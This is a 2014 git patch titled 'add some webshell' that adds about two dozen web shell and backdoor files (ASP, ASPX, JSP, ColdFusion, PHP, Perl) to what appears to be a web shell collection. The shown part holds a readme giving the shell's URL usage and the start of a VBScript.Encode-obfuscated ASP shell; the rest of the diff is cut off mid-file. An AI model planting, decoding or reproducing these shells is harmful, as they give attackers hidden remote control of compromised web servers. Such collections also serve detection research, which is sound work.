From 8870eb948420cbe66b05dee2f83eb6d32f12d212 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Mon, 19 May 2014 09:10:17 +0800
Subject: [PATCH] add some webshell

---
 asp/ajs/readme.md                             |    3 +
 asp/ajs/shell.asp                             |    2 +
 asp/ajs/shell_decoded.asp                     | 2198 +++++++++++++++
 aspx/asp.net-backdoors/ChangeLog.txt          |   52 +
 aspx/asp.net-backdoors/cmdexec.aspx           |   96 +
 aspx/asp.net-backdoors/filesystembrowser.aspx |  207 ++
 aspx/asp.net-backdoors/fileupload.aspx        |  126 +
 aspx/asp.net-backdoors/spexec.aspx            |  367 +++
 aspx/asp.net-backdoors/sql.aspx               |  104 +
 aspx/wso.aspx                                 | 1689 ++++++++++++
 jsp/java/java_faces_shell.xhtml               |  103 +
 jsp/java/readme.md                            |    2 +
 other/ololo.cfm                               |  688 +++++
 php/12309/12309.php.txt                       | 2066 +++++++++++++++
 php/12309/readme.md                           |   22 +
 php/pas/pas.php                               |  255 ++
 php/pas/password.txt                          |   21 +
 php/priv8-2012-bypass-shell.php.txt           | 2357 +++++++++++++++++
 php/wso/wso2.php                              | 1522 +++++++++++
 php/wso/wso2_pack.php                         |    7 +
 pl/pps-pl/pps-v1.0.pl                         |  173 ++
 pl/pps-pl/pps-v3.0.pl                         |   78 +
 pl/pps-pl/pps-v3.5.pl                         |   79 +
 pl/pps-pl/pps-v4.0.pl                         |   82 +
 24 files changed, 12299 insertions(+)
 create mode 100644 asp/ajs/readme.md
 create mode 100644 asp/ajs/shell.asp
 create mode 100644 asp/ajs/shell_decoded.asp
 create mode 100644 aspx/asp.net-backdoors/ChangeLog.txt
 create mode 100644 aspx/asp.net-backdoors/cmdexec.aspx
 create mode 100644 aspx/asp.net-backdoors/filesystembrowser.aspx
 create mode 100644 aspx/asp.net-backdoors/fileupload.aspx
 create mode 100644 aspx/asp.net-backdoors/spexec.aspx
 create mode 100644 aspx/asp.net-backdoors/sql.aspx
 create mode 100644 aspx/wso.aspx
 create mode 100644 jsp/java/java_faces_shell.xhtml
 create mode 100644 jsp/java/readme.md
 create mode 100644 other/ololo.cfm
 create mode 100644 php/12309/12309.php.txt
 create mode 100644 php/12309/readme.md
 create mode 100644 php/pas/pas.php
 create mode 100644 php/pas/password.txt
 create mode 100644 php/priv8-2012-bypass-shell.php.txt
 create mode 100644 php/wso/wso2.php
 create mode 100644 php/wso/wso2_pack.php
 create mode 100644 pl/pps-pl/pps-v1.0.pl
 create mode 100644 pl/pps-pl/pps-v3.0.pl
 create mode 100644 pl/pps-pl/pps-v3.5.pl
 create mode 100644 pl/pps-pl/pps-v4.0.pl

diff --git a/asp/ajs/readme.md b/asp/ajs/readme.md
new file mode 100644
index 00000000..18f9cbd4
--- /dev/null
+++ b/asp/ajs/readme.md
@@ -0,0 +1,3 @@
+like this:  
+
+www.site.com/shell.asp?x=a
\ No newline at end of file
diff --git a/asp/ajs/shell.asp b/asp/ajs/shell.asp
new file mode 100644
index 00000000..0f0bbe0d
--- /dev/null
+++ b/asp/ajs/shell.asp
@@ -0,0 +1,2 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^cjECAA==@#@&W2DkKxP6ask1kO@#@&WU~DDK.PM+/!hnP	+XY@#@&@#@&U+d/bGxcKrhWEOx2!@#@&UnM\nMRUmDbwDPks+GEDPx~F !Z@#@&k+/krGxcV1k['+TlG@#@&@#@&@#@&BMMCeeMMCeMeCMCeMCeCeeCeCMP,.CDb4sn,PeCMeCeeCMMeCeCeMeMMCeMeCM@#@&frh,s?6S,s;V^2mY4BPwkVnmOtBPoW^Nn.hlY4SP6WV9n.SKmmYrWUS,Ld~,C/aKrO^+@#@&9b:~:K[@#@&@#@&EBBEBE~Am/rm,?nODkxTdPEBBEv@#@&m/aKrYsn,'~JzB?,\q FJ@#@&vEBvBE~~ldbm,?+DYbUokPvBEBv@#@&@#@&UnY,s?}~xP;DlO+68N+^YvE?1Dr2DkxL wks+UzkYnsr(L+1Yrb@#@&s;V^wCO4'D2Vmm+v]n;!+kY ?n.7+..m.km4snk`JK):CmK")g?JzKAfJ*~r&JBJwJ*@#@&obV+hCY4P',hrNvs!VswCO4~(xUOD"+-cwEVs2mY4~rwr#Q8#@#@&sKV9nDhlOt,'~J0YvoE^VwmO4~&xUY.In-vs;V^2lDtSE'J#b@#@&0GV9nMSG1lDkW	P{~I;;+kYcE^WmmOkKxJ*@#@&:KNPxP]n$En/DcJsW[nr#@#@&@#@&kW`6G^NnMSKmlDkKUP{PEJ,W.~6WV9nDdWmmOrW	P{PEzE~KD~0KsNDJG1lYrG	PxPrwr#~Dtx@#@&d6GV9+.SKmCObWx,xPmNNksC/4`wWsNn.hlOt*@#@&Vdn@#@&dWG^NnDdG1lObW	P',l9[/^ldtv0Gs9+DdGmmYkKUb@#@&+	N~kW@#@&@#@&q6~`dZCd`In5!+dYcjD-DjlDbl(s+k`Ep`2]e|?K"(1VJ#*xE6{lr#~K4n	@#@&dUn/kkGUvJlssKhE#{q@#@&7U+k/kKxvE:HsGV9+.Jb/YrbP{PbM.CXvJ	Wa6ar	0GJ*@#@&i?ndkkWUcr:zsbsSrkYr#P{Pz.DmXcJ	WaaXkx6GJ*@#@&i]n/aW	/nR/C1tnZKUYMWs~{PJUG mCm4nr@#@&iI/wKxknRUYCY!/~x,J&ZqPtW\[~nDslU+UO^XE@#@&7I/2G	/+ 3XwrDd,'~Z@#@&dI/aGxk+ 2Xwr./l(dW^EY~xPgWS`bPR~8@#@&d"n/aWUdRb[[_+CN.,J2MlT:lr~rUW mCm4+E@#@&dIdwKx/ )N9Cl[+.~rmCm4nO1WUOMWVESrw.k7CD+E@#@&iI+kwKU/R)N9CnC9+D,ESKmlDrGxr~,srVnKmY4@#@&7I/2G	/+ 3	N@#@&AU9P(6@#@&@#@&&0,c?/dkKxcEmVVKAJ*P@!@*~q#,K4+U@#@&7"+dwKU/R3aakDnd,'~!@#@&iInkwKx/RAawbDn/m4dG^EY~',1WScbP P8@#@&d]nkwGxknRzN[ulNn.,J2DmLslEBJ	WO1l14+r@#@&d"+d2Kx/ b9NCC[+MPrmCm4n mGxD.W^JSEaDk-CD+E@#@&7"+daW	/+cZm^tZGxDDGs,'PrUW ml14nJ@#@&iIn/2G	/nRAUN@#@&3U9PqW@#@&@#@&?dkkG	`rlV^WSE#{F@#@&EeMMCeeCMeCeeCMMeCeCeMeMMCP~.m.k(Vn~,eeMMCeMeCMCeMCeCeeCeCMeCe@#@&@#@&vMCeeCMeCeeCMMeCeCeMeMMCeMP,B?}1 CkwP~MCeMeCMCeMCeCeeCeCMeCeMeC@#@&^^l/k~9Ur1@#@&@#@&iBaDr\COPh+s8+M/@#@&iwDr-mYnPK;Dw;D~,kx	+M/l^V@#@&@#@&7vaE4^rm,:+s8nDk@#@&d2E8sbm~YK]+kwGUk+d7vE$8WKsYPd4W!VN,Y4nPT+U+MlOn9PD2D/+	OCYbW	P8+~AMkOYUP9k.n1YVz~DW~Y4n,DnkwKx/Pv;/bxLP@!+h@*"+/aGxk+Rq.rY@!J+h@*b_,Nn0m;VDPx~6lVdn@#@&7w!8^k^,DmWMNknYhlLk	o7vE$4KGVYPk	[rmmY/~kW~KxsX,OtP^;MD+UO,wCo~ktG!V9P4Pa.W1+d/N~G	PwmL+9PD^GD9/YdR@#@&id7di7dEBn TRPAG!V[PMnDE.	PKxVHP8TPM+^WMNd~b0P@!n:@*I?c2Co/byn@!&ns@*~kk~/Y~OKPFT ,Nn0m;^Y~{P6lVk+,c:lU/,Y4CDPl^AlH/PmssPM+1W.Nd~mDnPa.W1+ddN#@#@&@#@&7w!8^k^,/!4P1Vmd/|kUkDkCsby+vb@#@&dd	nAMxDCYrG	`b@#@&7dDW]nkwWUdPxP6C^/n@#@&idDmK.Nk+OnmorUTP',Wl^/+@#@&7+	N,/;4@#@&@#@&7w!8Vbm~W!xmOrKx~+k^mwnv\mV#@#@&i7Nb:~mGW;8^+p!GY~P1]n\UW^k[EdS,mjW^rN!/@#@&idm9G!4s+5;KYn,',[ty @#@&dim]+7?GsbNEk~',[tl/@#@&id1?GVr[!/~','tys@#@&idNrh,kSP1;MDn	YGkobY@#@&di0GD,k~x,FPDGPvV+	c-l^#*@#@&d771E.DUYGkLrDP'~hbNc\msBPrBP8#@#@&di7k6PC/1hc^!DDUYGkobObP@*PLtT!~C	N~lk^hvm;.M+xO9borY*~@!P'4FwPY4+	@#@&id7d1E..xYGrobYP{~n/1la+5EnU1+cm!.DxO9bokOb@#@&7din^/nb0,l/1hv^EMDnxDfrLbY#,@*',[t;+0!,l	N~ld^S`^EM.+	Y9rTkYb~@!'~[4/yAo,Y4+x@#@&i7dim;DM+UOGkobOP{PJ';T!rP3P.kL4D`2l9J+6Yc46`Cd1hcm!.M+UDfbokD#,RPLt/ Z!bS, ~,T#BP *@#@&didVd+rW,ldmScm!D.n	YfrLbYbP@*x,[4;&R!Pmx9~lkmA`1E..xYGrobY#,@!xPLt;&$s~O4+U@#@&7did^;MD+UOGkLkD~{PE'EZ!J,_,.kTtO`al[J0Yv4+X`lk^A`1EMDnxO9borY*~O,[4/yZ!bS, SPZbBP+*@#@&ddi+^d+@#@&7diddn^+mD~mm/+,CdmS`1E.DnUDfrobO#@#@&77idd^Ck+~mGG!4sp!WY),^EMDnxDfrLbYP{~+kmlan5Ex1+cm;.M+UYGrobYb@#@&dd77imC/~1In7?KVk9EklP1E.DxO9bokD~',+/1C2+$Ex^+c^!D.+	OfborO*@#@&77id7mmdP^UW^kN!/=~m!D.+	Y9rTkY,xP/mm2n;!+	mn`^;MDnxD9kTkOb@#@&d77i+UN,dVn1Y@#@&didUN,kW@#@&d77/mm2+,'Pd^la+,[~m;.M+UYGrobY@#@&idxnaD@#@&dU9PW!x1YkKx@#@&@#@&d2E(Vr^,N+6CE^YP6;UmDkKx~YGBUrH`	C:~~-mV~~U/O+9b@#@&7ik6PxKY,U+kYnN,lU[,xWD~kk2:aOz`	ls+bPO4x~hMrY`E`r#@#@&7ikWP	GDPrk2swYH`	C:#~Y4+U~SDkDn`rJJr~'P/1l2+cUm:n#,'PrJEl,J#@#@&idL+	nMlO.mVE`7CV*@#@&dikW~	WY,U+kY+9~Cx9P	WOPrdA:2YHcxm:nb,YtnU,h.kDnvJNr#@#@&diYKB?}1~',W;OaEY@#@&@#@&ddbW~k	xD/lss,'~!,Otx~UhMnUDCYbG	`b@#@&i+x9P6;x1YrW	@#@&@#@&dBCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCe@#@&dEe~oxn.mY+@#@&dEeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeC@#@&daDr-mY+,WE	mYbGUPT+	+.lOnjlsEc\mVb@#@&ddrW,kd1!s^`-mV*PY4+	@#@&id7hMkOnvJx!sVr#@#@&77+^/kWPrdzD.lHc\mVb~Dt+U@#@&d7dTn	+.mYbDMlHc\mVb@#@&d7n^/+bWPb/r(%nmD`7ls#~O4+U@#@&7diNrh,Y1ChPlPDHm:n,',YXa+	C:`-l^#@#@&iddbWP7lV,rdP	WDtrxL~Dtnx@#@&did7AMkYncrx;V^E*@#@&idi+Vk+bWPD1C:Px~rfk1OkKxlMzEPKD,YHlhn,'~J&]+$EndDfk^ObWUlMzrPO4+	@#@&idi7oxnDmYn9bmYbGxmDXv-CV*@#@&d7dnsk+r0,O1m:n~{PJ]n1W.NknDJ~Dtx@#@&di7dT+U+MlOn"+mK.Nk+Yv-CV*@#@&d7dnsk+r0,O1m:n~{PJ(];;+kOrPO4+	@#@&idi7/Y~D;~x,/+M-+MRmMnCYr(LnmOcr/^Db2YbxL 9kmOrKxCDHE*@#@&ididD;cCN9PEm^knUDm+MOk6kmmOnJBP7lsR/sb+UY;nDDkWr1lYn@#@&d7di.; mN9PJ1WKVk/E~,\CscmWKVk/@#@&77diD; l[[,JWWMhJBP-C^R0G.s@#@&di7iDn$RmNN,J$;+MXdYMkULr~P7CVc;E.z?DDbxL@#@&7id7D5RmN[~r/+.-D-lMrm4s/r~P7l^ /D-+M.C.bl4^n/@#@&di77D;cl[N~EDWOl^8XD+dEBP\CscYGYms~XO/@#@&didiL+	+.lD+9r1YkKUlMX`Mn5#@#@&id7+sdkWPDHls+~x,JqjOMkUodrkYE,Y4+x@#@&i7dikWP7ls 1WE	OP{PF,O4+	@#@&d7d77DWB?}HP:2OH~P-C^`q#B~DD;@#@&ddids/@#@&did77T+x.lD+bM.CXv\mVb@#@&7id7+	[Pb0@#@&iddnsk+@#@&i7idLxDlD+}8LmO`7lsb@#@&di7+	NPbW@#@&idVd+@#@&id7B(GW^@#@&7idNrh,\CD:za@#@&idi\lMKH2P{P-lMKz2`\ms#@#@&di7r0,\mDPX2~{PqF,Otx@#@&idd7r6P-l^~Dtn	PSDkD+vEYMEnJ*Pnsk+PS.kD+`rWCVk+r#@#@&77iBrxDSP^WULBP4zO@#@&di7Vdk6P\mD:zw,'~ ,W.~7lD:zw,'P2~GD,\mDPX2~{PqG,GD,\C.:Xw~x,F1PD4x@#@&diddSDbO+vmJxT`-C^##@#@&didBkrUo^+BP[W;8^+SP1;DM+U^H@#@&77i+s/r6P-mD:Xw,',*PKD~\mDPzaP',XPKDP7C.KHw,'~v~GMP-lMPXaPx~8cPO4x@#@&i7idAMkD+`M+asl1+cmG4sc7lV*SPr~JB~ERr#*@#@&d77Vd+@#@&did7AMkYncrJEJ,',+d1la+`7l^~[,JE#,[~ErJJ*@#@&iddU[Pb0@#@&7dnU9Pr0@#@&dionUDlOnjlsE~{PG!YaEY@#@&inx9PWE	mOrKx@#@&@#@&iBeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCe@#@&iBM~T+x.lD+bM.CX@#@&iBMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCee@#@&daDk7CO+,/!4~onUDCY)DMlzc7lVb@#@&d7Nbh,kO:BPkBPkOq9@#@&dih.rD+`r,J*@#@&i7r0v\mVc!b~@!@*~J	G6X6rU6WJb~Dtnx@#@&id7kY&NP{PZ@#@&idnVk+@#@&iddkOq9P',q@#@&idx[PrW@#@&7dEOtPWGMP+C^4PCV^GS/~!/,YW,/!2wKDOPmVdG,:E^Ok,NksnU/bW	lsPC.Mlz/@#@&di0G.,kPx~kY(N,OKPi~W!xNv\ms#@#@&7dikW~bP@*,dY&NPD4nx,hMkO+cEBJb@#@&7dionUDlOnjlsEc7lsvk*#@#@&diU+XY@#@&idA.bY+vETr#@#@&7nx9PkE8@#@&@#@&dveCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeC@#@&dEe,onxn.mYnfb^YbWUCMX@#@&7EeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeM@#@&7wMk-CD+Pd;(PL+	nMlOfbmYbW	CDH`-l^#@#@&idk	U+MZl^s~',k	xnD/C^V~_,q@#@&d7r6P\CscmGE	O,'~ZPDt+	@#@&7diYG9UrH~:wDz~,xE^sSPDD!+@#@&77i+akD~/!4@#@&id+U[,kW@#@&7iNrsP0+XBPb@#@&idADbYncr	J*@#@&idk,x~!@#@&idWW.~l^t,V+HPrU,\ls@#@&d7dbW,k~@*PZPY4+	~hMkO+vJSE*@#@&i7dDW9U6HP0+H~~\Csv3nX*SPDD;n@#@&d77bPxPb~3Pq@#@&idx6D@#@&idADbYncr8J*@#@&idk	UnD;l^V~'~r	xnD;CV^PR~8@#@&7n	N~/!8@#@&@#@&dEeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCee@#@&iBMPTn	+.mYI+1WM[/Y@#@&iBMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCe@#@&daDb-lD+~/!4~Lx+MCYI+1G.Nk+D`-lsb@#@&7d9r:,kS~1ED]GS~~mKsjls!+@#@&dihMrY`E$r#@#@&idm!.IKhP{~T@#@&diB.+^GMNd+D wmondby+~x,OqPsnmxd,kDPkkP	GY,wCoN @#@&ddS4k^+P	GOP7l^RnWW~mx[PvcDmG.9/+OKmorxT~mx[,m!DIKh,@!P7lsRalLnUkybPKDP7CsRM+1W.N/G!xOP{~O8PG.,xWO~M+^WM[k+OhlTkxT#@#@&didrx	+./mVV,xPbxx./l^V,_~F@#@&id7D[ksP^G^.ls;`-l^ 6kn^NkRmKE	OP Pq#@#@&77i0WM~k,'PZ~OW,\mV 0rn^NdR1GE	Y~R,F@#@&7id7k6~,qdgE^V`7l^ 0b+sNk`rbc\l^;+*PY4nU@#@&did7d^G^.CV!n`b#~x,J1iJdJ@#@&i7idn^/k0,`:.ks`-l^RWrVNkck*R\ms;+*'rJbPO4x@#@&i7did^G^.ls;`r#,x,J'	4kwir@#@&7didnVk+@#@&iddi7mKV.ms;+vk*PxPjnM\nDcuYsV3U1WNnc7lsR6rV[k`b#R7l^;+*@#@&did7n	NPbW@#@&ddiUn6D@#@&d7dLn	+.lDnbMDCzvmWs#mV;+*@#@&d7i\mVRsW7nx6O`*@#@&7idm!.IKhP{~^EMIKh~_~q@#@&7dir0,xGO,\ls WWPmU9PcvDmWMNknYhlLk	o~C	NP1;D"Wh,@!~\mVcwConjbyn#,GD,\CscD+^GMN/W!UDPx,O8PWMP	GY,DnmKD[dYnmLk	o#,O4+	PSDrYncr~E#@#@&didrU	+D/C^V~',r	xnMZmVV,O,q@#@&d7hx[@#@&ddS.kD+`rDE#@#@&i+UN~d!4@#@&@#@&dEeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCe@#@&7BM~T+U+MCYIn^KDNdnD@#@&dEMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMe@#@&72Mk\COPdE(~T+UDmY+"+1GD9/nYo`-C^#@#@&7d9k:,rSP1EMIGh@#@&idADbO+vJ,E*@#@&771E.IKA,'~Z@#@&ddED^WMNd+DR2CT+/b"+,'P q~:l	/~kO~b/~xKOPalLn9R@#@&7ih4k^n,xGDP7lVc+KWPmx[Pv`.n1WD9d+DnlTrUo,l	N~m;."WAP@!~\mV 2mo+jr.+bPK.,\C^RM+mKD9/W!xOP{PRq,WD,UWDPD^GD9/YKlLr	ob@#@&7dikUUDZCs^PxPbU	+.;l^VP3P8@#@&id7hMkOnvJ	rb@#@&ddiWGD,k,'~!~OKP-l^ 0b+s[kRmG;	Y~O,q@#@&7idik0,k,@*PZPOtx~AMkYcJBJ#@#@&7didDWB?6H,V/lkn`7ls 6k+s[k`r#cUm:n*~,\l^R6r+^Nd`b# -mVESPDDE@#@&did	+aY@#@&id7hMrY`ENr#@#@&7id-l^ sW-x6Yv#@#@&did^EMIGA,'P1;D"Wh,Q~F@#@&id7kW~	WOP7CVc+GW,lx[~v`.+1GMNdYhlobxT~l	N~m!D]GSP@!,-l^RwmLn?by#~W.~7lsRMnmKD[/KExO~{PRF,GMPUKY,D+1WM[/YKlTkUL*PY4nx,hDbOn`r~r#@#@&77ikUx.ZmVs~{PkUUD/l^s,O~8@#@&ddS+	[@#@&d7hMkOnvJTrb@#@&d+	[~/!4@#@&@#@&7vCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeC@#@&ivMPT+	+.lOn}4%+1O@#@&dvMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCe@#@&72Mk-lDnPkE8~T+xn.mYnr(%mOv\mV#@#@&i7Nb:~wMW2d@#@&diGx,+DMG.PM+kEh+~U6O@#@&7dk+O~aDW2d,'~\mscDn6VmYv#@#@&dikWPD.~{P!,Otx@#@&77dKx,+.DG.,oGYK~!@#@&77ikxUnMZCV^~{Pr	xDZmV^~_,F@#@&id7OK9?}HP:wDzSPaDKwd~~OMEn@#@&7dikUUDZCs^PxPbU	+.;l^VP P8@#@&idnVk+@#@&iddKUPDDK.~oKYKPT@#@&7idADbO+vJEErP[~nkmCwcDX2xm:+v\ms#*P'PrJEE*@#@&i7+	NPbW@#@&i+	N~/;8@#@&@#@&iveCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMe@#@&iBMPUnSMnx.lDkGU@#@&dvMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMC@#@&da.k7lOn,/E8~	+AMUDCDkKx`*@#@&7dKEOw!Y~x,+:aOX@#@&dirUxD;lsV~x,!@#@&inx9Pd;(@#@&@#@&iBMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMC@#@&ive,9/KU3/1la+j;;n	mn@#@&7BCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeC@#@&iw.k7lOn,0E	^YbWx,ndmmw;;+U^`[kTrY*@#@&7i+/^Ca+5EU1+~{Pr-EZ!r~_,Dro4Yc2mNSWYvt+XcC/1hvNrorO*#SPySPZ#S~y#@#@&7x[P6;	mObW	@#@&@#@&iveCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCe@#@&7vCP2l9J+6Y@#@&iBeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMe@#@&72Mk\mO+,0E	^OkKx,wCNJn6Yc\msE~~OKYlsJxLY4S,wC9Nbxo;tm.#@#@&7dal[J0Y,xPMko4Ocm^W	+cwC[9kUo;4lM~~OKYlsJxLY4b,[~7l^E+BPDGYmVJ+	oO4*@#@&inx9P0!U^YbW	@#@&@#@&7EeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCe@#@&dEe,^VKxn@#@&dvMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMe@#@&daDr-mY+~W!x^YbG	P^^W	+`(XjCV,/ODBPUb@#@&di[ksPk@#@&7d6WMPrPx~8POW,UP=P^sKx+~x,msW	n,[~kYMP),xaY@#@&7+	N~W!xmDrW	@#@&@#@&7BCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCe@#@&ivCPAMkD+@#@&dEMeCeMeCeMMCeeCMeCeeCMMeCeCeMeMMCeMeCMeCeMMCeeMMCeMeCMCeMCeCeeCeCMeCeMeCeMMCeeCMeCeeCMMeCeC@#@&d2.b\CY~/!4~AMkYnc7ls#@#@&idr6PDWI/aGxk+~Y4+U@#@&ddi]+kwW	dnRqDbYn`-C^#@#@&i7+^/n@#@&dd7G!Y2ED~{PG!YaEY,[,-l^@#@&di+U[,k0@#@&dxN,d;4@#@&@#@&nx[~1VC/k@#@&EeMMCeeMMCeMeCMCeMCeCeeCeC~Px?61cld2,PeCMeCeeCMMeCeCeMeMMCeMeCM@#@&@#@&@#@&BeMMCeMeCMCeMCeCeeCeCMeCeMP,s;U1Rlk2P,eeCMMeCeCeMeMMCeMeCMeCeMM@#@&0;U1YrW	~mN[kVm/tvwmOt*@#@&P,P~r6PDbLtD`wmO4~8#{JwJ~O4+UPm[NkVCd4'wCO4PnVkn,l[9/^l/4'aCY4P'Pr-E@#@&+x9~0!xmDrGx@#@&@#@&oEU^DkGx,oWM:COUkyncbxO?b"#@#@&d&0Pvk	O?bynP@!PqTyc#,Ptx@#@&77sKDslO?r"PxPbUYUk"n,[PE~~J@#@&i3^/n&0,`k	YUryP@!P8!+*CF!y*#,KtU@#@&idwW.:COUk"+,xPwW.hmY1;h(+.`bUD?r.+JF!ycB+#,[~J,|$E@#@&dAs/q0,crxD?bynP@!~8!+cCq!ycMqZ cb~:tnx@#@&idoKDslYUk.nP{PoWM:COgE:(nDvkxDjryzvFT *M8!+c*S *P'~rPH$E@#@&72^d@#@&idwWDslDjk.+~',sG.slYg;:(+DvrUYUk.+&`qTycMFZ+cCFT+W#~+b,[~J,!~J@#@&dAxN,q6@#@&Ax[PwEU^DkW	@#@&@#@&s!U^YbW	P$ldn+c3x1GN`rUGlYCb@#@&~P;G	/O,Am/++c,xPrb$ZG2o!_q9nJHgrn5]jK`.q(e}C81Nn0T4kN3sh	Ww5.kY;\SaHyT8 2c*+GR1_JJ@#@&,P9rsPm};YBP/};O~,q@#@&@#@&~~wW.P&~',F~PKPSnUvkUfmOm#~UYwP2@#@&~P,P9ksPU!MWEaSParEDS~/VDKE2@#@&@#@&P~P,UMMW;2,'P'u8!T!Z~CP)kmvHk9`bUfmYC~,qS~8##,QP|@#@&,~~P,PLCq!T~CP\XzjZvHr[vkx9CDlSP&~3PqBP8##,_,\Xz?/`tk[cbxfmOlBPq,Q~ BP8#b@#@&@#@&P~P,UMMW;2,'P6^D`UMMG!wb@#@&@#@&P,P,UMMW;w,'~jDDk	L`RPO,JnxvxVDGE2bBPE!rbPLPU!MWE2@#@&@#@&P,~,w6!Y,'Ptk9cAm/nvW~~/dxovE[KJPL~\k9`	M.W;2BPq~,+#*PQ~8~Pqb,_~{@#@&,P~,P,Hk9`~C/v*~,ZJUT`JLGJ,[Ptr[`	MMW;wS~2~~ *bP3PqS,F#~Q,{@#@&,~,P~,HbN`~lknvW~~ZdxLcr[Wr~[,Hk9cUMMW!wSPXS, b#,QP8~~q*P_~m@#@&~P,~,P\bNvAlk++*~,ZJxT`E'KJPL~HbN`	!.W!wBP{~~+*#~_,q~,Fb@#@&@#@&~~,Pdr!O,'~kr!YP3Pa6ED@#@&@#@&P~H6Y@#@&P,?+^n^Y,Zm/nPJn	`rxGCYm#~\KNPf@#@&P~P,/m/n,F=PBRP(rY,0rxmV@#@&,PP,~PkrED~xPd+6Yc/6;D~~SU`kr;O*PO~+*PQPrx{J@#@&P,PP;lknPy)~B8v~8bYP6rxmV@#@&~~P,P,/6EO~{PJ+6O`kr;OBPSnUv/6EDb,O~8#,_Pr'r@#@&,P3x9Pjn^+mD@#@&,PAmdnvW2	mGNn~{Pdr!O@#@&2U[,sEU^DkGx@#@&@#@&o!x1YkKx,\Xz?/`}xn/4lD*@#@&,Pq6~6xZ4l.Px~rJ~K4nx,Hz)UZPx~ZP3Vkn,Hzz?;P',bk^`}xnZ4l.b@#@&2	[PwEx1OrW	@#@&@#@&@#@&o!x^YbGx,ACdvc9n1W[+v$H.C^P(l/vWjYMkUo*@#@&~,ZW	dY,Alknc,',J)A/9As!C&B|dHH6hpIjP`.	(Itm4^9+6otbL0s:	W2;M/O;7h6H"!8 &WXGR,3zE@#@&~,fr:,[lDlJn	oY4S,/6EDS,o.KEaA+Tk	@#@&@#@&~P(ldn+c?D.k	oP{~]+aVmmn`8Ck+cUODbxLS,\4/.d0SPrE*@#@&,P(l/vWjYMkUo,'~]wVm^+v4lkncUYMkUoS~74Pl(SPrJb@#@&PP8Ck+cUOMkUTP{PIw^Cm`8lk+*UYDbUoBPJ,ESPrJ*@#@&@#@&~,NCYmJ+	oO4,'PJn	`8lkn+cjDDbxo*@#@&~P&0~NmYCJxoD4PtWN,*~@!@*PZPPtnU@#@&~P,~2MD ]mk/n~8~~J~Ck+WfmW9+rSPrACN,ACdvc,dYMkxT E@#@&P,P~2arDPoE	^YbWU@#@&PP3U9P(0@#@&@#@&@#@&P,sWMPT.W!w$+TkU~{PF,PW,NlDCJ+	